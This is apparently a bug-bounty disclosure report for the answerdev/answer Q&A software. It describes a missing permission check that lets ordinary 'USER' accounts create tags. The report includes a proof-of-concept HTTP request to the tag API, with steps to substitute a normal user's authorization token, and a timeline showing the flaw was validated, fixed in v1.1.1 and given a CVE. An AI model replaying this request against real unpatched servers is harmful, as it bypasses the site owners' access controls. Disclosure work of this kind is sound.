attackers with role "USER" can create tags in answerdev/answer


Reported on

Jul 1st 2023


It seems that the users with role ""USER" has no permission with creating tags, but we do not enforce it. Ohers operation, like edit and delete has no problem.

Proof of Concept

pull the latest docker and setup answer

1 create a user with name "normaluser", whose role is "USER"

2 admin create a tag

3 using burpsuit to hijack the requst, as below:

POST /answer/api/v1/tag HTTP/1.1
Host: localhost:9080
Content-Length: 65
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Content-Type: application/json
Accept-Language: en_US
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Linux"
Accept: */*
Origin: http://localhost:9080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9080/tags/create
Accept-Encoding: gzip, deflate
Connection: close
Authorization: fd201c60-1819-11ee-82d0-0242ac170002


4 replacing Authorization with normaluser's Authorization , and send the reqeust:

3 response can be like:

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Date: Sat, 01 Jul 2023 14:25:32 GMT
Content-Length: 81
Connection: close



privilege escape

We are processing your report and will contact the answerdev/answer team within 24 hours. 3 months ago
lujiefsi modified the report
3 months ago
We have contacted a member of the answerdev/answer team and are waiting to hear back 3 months ago
answerdev/answer maintainer validated this vulnerability 2 months ago

Thanks for the feedback!

lujiefsi has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
answerdev/answer maintainer marked this as fixed in v1.1.1 with commit 964195 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
answerdev/answer maintainer published this vulnerability 2 months ago
to join this conversation